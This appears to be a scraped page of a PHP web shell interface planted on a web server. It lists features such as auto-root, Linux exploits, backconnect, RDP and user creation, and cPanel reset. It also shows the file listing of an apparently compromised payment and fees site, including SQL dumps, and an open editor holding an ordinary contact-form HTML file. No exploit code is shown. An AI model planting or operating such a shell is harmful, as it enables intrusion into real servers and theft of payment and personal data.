Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
temppayment /
pg /
fees-old /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
CSS
[ DIR ]
drwxr-xr-x
alumni-form-ag
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
css-ag
[ DIR ]
drwxr-xr-x
hosted_php
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
student
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
Checksum.php
642
B
-rw-r--r--
FailedTRAN.php
4.85
KB
-rw-r--r--
ForgetPassword.php
1.87
KB
-rw-r--r--
ForgetPasswordPage.php
3.34
KB
-rw-r--r--
GetHandleRES.php
10.87
KB
-rw-r--r--
Index.html
11.28
KB
-rw-r--r--
Reciept.disabledphp
5.1
KB
-rw-r--r--
Reciept.php
5.1
KB
-rw-r--r--
SendPerformREQ.php
9.45
KB
-rw-r--r--
StatusTRAN.php
5.24
KB
-rw-r--r--
StatusTRANold.php
6.09
KB
-rw-r--r--
account.php
3.11
KB
-rw-r--r--
ack.php
7.08
KB
-rw-r--r--
billdesk.disabledphp
1.86
KB
-rw-r--r--
calendar.css
2.65
KB
-rw-r--r--
calendar.js
16.85
KB
-rw-r--r--
calendar_form.php
18.27
KB
-rw-r--r--
corner-bottomleft.jpg
334
B
-rw-r--r--
corner-bottomright.jpg
341
B
-rw-r--r--
corner-topleft.jpg
335
B
-rw-r--r--
corner-topright.jpg
348
B
-rw-r--r--
database.php
2.3
KB
-rw-r--r--
donatebilldesk.php
2.6
KB
-rw-r--r--
donatehdfc.php
11.19
KB
-rw-r--r--
donationmail.php
5.94
KB
-rw-r--r--
error_log
13.22
MB
-rw-r--r--
formvalidator.php
14.1
KB
-rw-r--r--
giveback.php
19.01
KB
-rw-r--r--
giveback_backup.php
10.46
KB
-rw-r--r--
giveback_beforeeditedbyankit.p...
19.09
KB
-rw-r--r--
history.php
1.9
KB
-rw-r--r--
home.html
1.04
KB
-rw-r--r--
index.php
22.04
KB
-rw-r--r--
index1032015.php
22.05
KB
-rw-r--r--
indexb.php
22.97
KB
-rw-r--r--
indexold.php
23.13
KB
-rw-r--r--
jquery-latest.js
166.11
KB
-rw-r--r--
jquery.js
76.54
KB
-rw-r--r--
login.html
780
B
-rw-r--r--
logo.jpg
9.63
KB
-rw-r--r--
misp.html
14.15
KB
-rw-r--r--
misp.php
12.61
KB
-rw-r--r--
newstudent.php
9.72
KB
-rw-r--r--
pay.php
2.45
KB
-rw-r--r--
paymenthistory.php
1.94
KB
-rw-r--r--
phdcheckstatus.php
1.07
KB
-rw-r--r--
recounsiliation.php
6.15
KB
-rw-r--r--
register.php
2.47
KB
-rw-r--r--
register1.php
2.36
KB
-rw-r--r--
register_workshop.php
7.78
KB
-rw-r--r--
student.php
9.73
KB
-rw-r--r--
submittobill.php
551
B
-rw-r--r--
test.html
2.14
KB
-rw-r--r--
test.php
768
B
-rw-r--r--
thanks.php
4.42
KB
-rw-r--r--
user.php
4.84
KB
-rw-r--r--
userlist.php
472
B
-rw-r--r--
vendor.php
10.63
KB
-rw-r--r--
vendorold.php
9.86
KB
-rw-r--r--
wanted_sql_file.sql
2.33
MB
-rw-r--r--
webiiit_pg.sql
1.42
MB
-rw-r--r--
welcome.backup.php
18.06
KB
-rw-r--r--
welcome.php
23.38
KB
-rw-r--r--
welcome.txt
23.38
KB
-rw-r--r--
welcome1032015.php
23.37
KB
-rw-r--r--
welcomebill.php
5.29
KB
-rw-r--r--
welcomehdfc.php
5.8
KB
-rw-r--r--
welcomeold.php
14.9
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Index.html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>HCL</title> <script type="text/javascript"> function validateForm(form, formParams) { for(var fieldName in formParams) { var preFilledValue = formParams[fieldName][0]; var errorMessage = formParams[fieldName][1]; var elem = document.getElementsByName(fieldName)[0]; if(elem.type=='radio'){ var radioLength = document.getElementsByName(fieldName).length; var anyChecked= false; for(var i = 0; i < radioLength; i++) { var radioElem = document.getElementsByName(fieldName)[i]; if(radioElem.checked) { anyChecked=true; break; } } if(anyChecked==false){ alert(errorMessage); if(elem.type!='hidden') elem.focus(); return false; } } var providedValue = elem.value.replace(/^\s+|\s+$/g,""); if((providedValue==null || providedValue=="" || providedValue==preFilledValue) && (fieldName!='phone')) { alert(errorMessage); if(elem.type!='hidden') elem.focus(); return false; } if(fieldName=='email'){ if(!validate_email(providedValue)){ alert("Not a valid e-mail address! Try Again"); elem.focus(); return false; } } if(fieldName=='name'){ if(!isAlpha(providedValue)){ alert("Your Name should contain only alphabets!"); elem.focus(); return false; } } if(fieldName=='mobile'){ if(!isNumeric(providedValue) || providedValue.length < 9){ alert("Please provide a valid Mobile Number"); elem.focus(); return false; } } } var checkElem = document.getElementsByName("check1")[0]; if (checkElem.checked == false ) { alert("Please Agree to the Terms of Use to Continue"); checkElem.focus(); return false; } return true; } function validate_email(email) { if (/^\w+([\.-]?\w+)*@\w+([\.-]?\w+)*(\.\w{2,3})+$/.test(email)) { return true; } return false; } function isNumeric(value) { var numericExpression = /^[0-9]+$/; if(value.match(numericExpression)) { return true; } return false; } function isAlpha(value) { var alphaExpression = /^[(a-z)|(A-Z)| ]+$/; if(value.match(alphaExpression)) { return true; } return false; } function fieldSet(obj,str) { if(obj.value == str) { obj.value = ''; } } function fieldReset(obj,str) { if(obj.value == '') { obj.value = str; } } </script> <script type="text/javascript"> var formParams= new Array(); formParams["dob_date"]=new Array(); formParams["dob_date"][0]="Date"; formParams["dob_date"][1]="Please provide Complete Date of Birth"; formParams["dob_month"]=new Array(); formParams["dob_month"][0]="Month"; formParams["dob_month"][1]="Please provide Complete Month of Birth"; formParams["dob_year"]=new Array(); formParams["dob_year"][0]="Year"; formParams["dob_year"][1]="Please provide Complete Year of Birth"; formParams["name"]=new Array(); formParams["name"][0]=""; formParams["name"][1]="Please provide Name"; formParams["mobile"]=new Array(); formParams["mobile"][0]=""; formParams["mobile"][1]="Please provide mobile"; formParams["email"]=new Array(); formParams["email"][0]=""; formParams["email"][1]="Please provide email id"; formParams["query"]=new Array(); formParams["query"][0]=""; formParams["query"][1]="Query field is empty"; </script> </head> <style> html, body, div, span, applet, object, iframe,h1, h2, h3, h4, h5, h6, p, blockquote, pre,a, abbr, acronym, address, big, cite, code,del, dfn, em, font, img, ins, kbd, q, s, samp,small, strike, strong, sub, sup, tt, var,b, u, i, center,dl, dt, dd, ol, ul, li,fieldset, form, label, legend,table, caption, tbody, tfoot, thead, tr, th, td {margin: 0;padding: 0;border: 0; background: transparent} body{ margin:0; padding:0; font-size:12px; font-family:Arial, Helvetica, sans-serif; color:#1479b4; background-color:#fff; background-image:url(http://www.barefacedliar.com/images/common/bg.jpg) } @font-face { font-family:MyriadPro; src: url("fonts/MyriadPro-Regular.otf"); } a{ color:#6a6a6a; text-decoration:none} a:hover{color:#2565a6; text-decoration:none} h1,h2,h3{ font-weight:normal; color:#2b4a6a; font-family:MyriadPro, Verdana, Arial, sans-serif;} h2{} h1{ padding-bottom:5px; font-weight:bold!important} #container{ margin:0 auto; } #header{ background:#1479b4} #logo{ padding-left:23px; padding-top:38px; float:left} #cust_support{ float:right;width:120px; padding-top:50px; padding-left:50px; color:#fff; margin-top:30px} #page{ padding:30px 36px; background:url(http://www.barefacedliar.com/images/common/bg.jpg)} .contact_form { margin-top: 20px; margin-bottom: 20px; } .contact_form .notification_error { -moz-border-radius:5px; -webkit-border-radius:5px; width: auto; margin-right:27px; border: 1px solid #ff0000; height: auto; padding: 4px; background-color: #fff; text-align: left; color:#ff0000; } .contact_form .notification_ok { color: #797c7c; background-color:#fff; border:1px solid #d7d7d7; -moz-border-radius:5px; -webkit-border-radius:5px; width:auto; margin-right:27px; height: auto; padding: 8px; text-align: center; } .contact_form .button { float: right; margin-top: 10px; margin-bottom: 0px; width:162px; height:38px; margin-left: 0px; margin-right: 10px; } .contact_form label { width: 125px; float: left; text-align: left; letter-spacing: 1px; color: #2b4a6a; padding-right: 5px; line-height: 20px; font-size: 12px; margin-top: 0px; margin-right: 5px; margin-bottom: 0px; margin-left: 10px; padding-top:10px } .contact_form input { color: #797c7c; background-color:#fff; border:1px solid #d7d7d7; margin:5px 5px 10px 5px; padding: 6px 5px; float: left; -moz-border-radius:5px; -webkit-border-radius:5px; font-size: 12px; font-family: Arial, Helvetica, sans-serif; width:208px; } .contact_form textarea{ height:110px; width:208px; margin:5px 5px 5px 5px; float:left; -moz-border-radius:5px; -webkit-border-radius:5px; background-color:#fff; border:1px solid #d7d7d7; padding: 8px 5px; color: #797c7c; font-size: 12px; font-family: Arial, Helvetica, sans-serif; } .contact_form br{ clear:left;} .sub_form{float:left!important; width:208px!important; border:none!important; background:none!important; margin-top:0!important} #copyright{ font-size:11px; color:} .red{ color:#e91432} .fnt14{ font-size:14px;} </style> <body> <div id="container"> <div id="header" align="center"> <img src="header.jpg" /> </div> <div id="page"> <div class="contact_form"> <div id="note"></div> <div id="fields"> <form action="contact.php" method="post" onSubmit="return validateForm(this, formParams);" name="form1"> <label><span class="red">*</span>Name<br /></label> <input name="name" type="text" class="textbox rc5" value="" size="30" /> <br /> <label><span class="red">*</span>E-Mail<br /></label> <input name="email" type="text" class="textbox rc5" value="" size="30" id="email" /><br /> <label><span class="red">*</span>Mobile Number:<br /></label> <input name="mobile" type="text" class="textbox rc5" value="" size="30" id="mobile" maxlength="10" /> <br /> <p><label>Date of Birth:</label><select name="dob_date" class="default1 fLeft mRight5" style="width:100px;"><option value="0">Date</option><option>1</option> <option>2</option> <option>3</option> <option>4</option> <option>5</option> <option>6</option> <option>7</option> <option>8</option> <option>9</option> <option>10</option> <option>11</option> <option>12</option> <option>13</option> <option>14</option> <option>15</option> <option>16</option> <option>17</option> <option>18</option> <option>19</option> <option>20</option> <option>21</option> <option>22</option> <option>23</option> <option>24</option> <option>25</option> <option>26</option> <option>27</option> <option>28</option> <option>29</option> <option>30</option> <option>31</option></select><select name="dob_month" class="default1 fLeft mRight5" style="width:100px;"><option>Month</option><option>1</option> <option>2</option> <option>3</option> <option>4</option> <option>5</option> <option>6</option> <option>7</option> <option>8</option> <option>9</option> <option>10</option> <option>11</option> <option>12</option></select><select name="dob_year" class="default1 fLeft" style="width:166px;"><option>Year</option> <option>2011</option> <option>2010</option> <option>2009</option> <option>2008</option> <option>2007</option> <option>2006</option> <option>2005</option> <option>2004</option> <option>2003</option> <option>2002</option> <option>2001</option> <option>2000</option> <option>1999</option> <option>1998</option> <option>1997</option> <option>1996</option> <option>1995</option> <option>1994</option> <option>1993</option> <option>1992</option> <option>1991</option> <option>1990</option> <option>1989</option> <option>1988</option> <option>1987</option> <option>1986</option> <option>1985</option> <option>1984</option> <option>1983</option> <option>1982</option> <option>1981</option> <option>1980</option> <option>1979</option> <option>1978</option> <option>1977</option> <option>1976</option> <option>1975</option> <option>1974</option> <option>1973</option> <option>1972</option> <option>1971</option> <option>1970</option> </select></p> <br /> <label>Twitter Handle:</label> <input name="twitter" type="text" class="textbox rc5" value="" size="30" id="srno" /><br /> <label >Facebook Handle:<br /></label> <input name="facebook" type="text" class="textbox rc5" value="" size="30" id="srno" /> <br /> <label style="padding-top:0px">Type of query</label> <select id="qtype" name="qtype"> <option>Purchase CD</option> <option>Contest</option> <option>Tour Schedule</option> <option>Booking</option> <option>General</option> </select> <br /> <label><span class="red">*</span>Query:</label> <textarea name="query" cols="" rows="" class="rc5" id="query"></textarea> <br /> <label> </label> <input type="reset" value="RESET" style="background: url(reset.jpg); width:218px; height:25px; border:0px; color:#FFF; font-size:10px"> <input type="submit" name="submit" value="SUBMIT" onclick="return standardValidation();" style="background: url(reset.jpg); width:218px; height:25px; border:0px; color:#FFF" /> </form> </div> <br clear="all" /> </div> </div> </div> </body> </html>
Close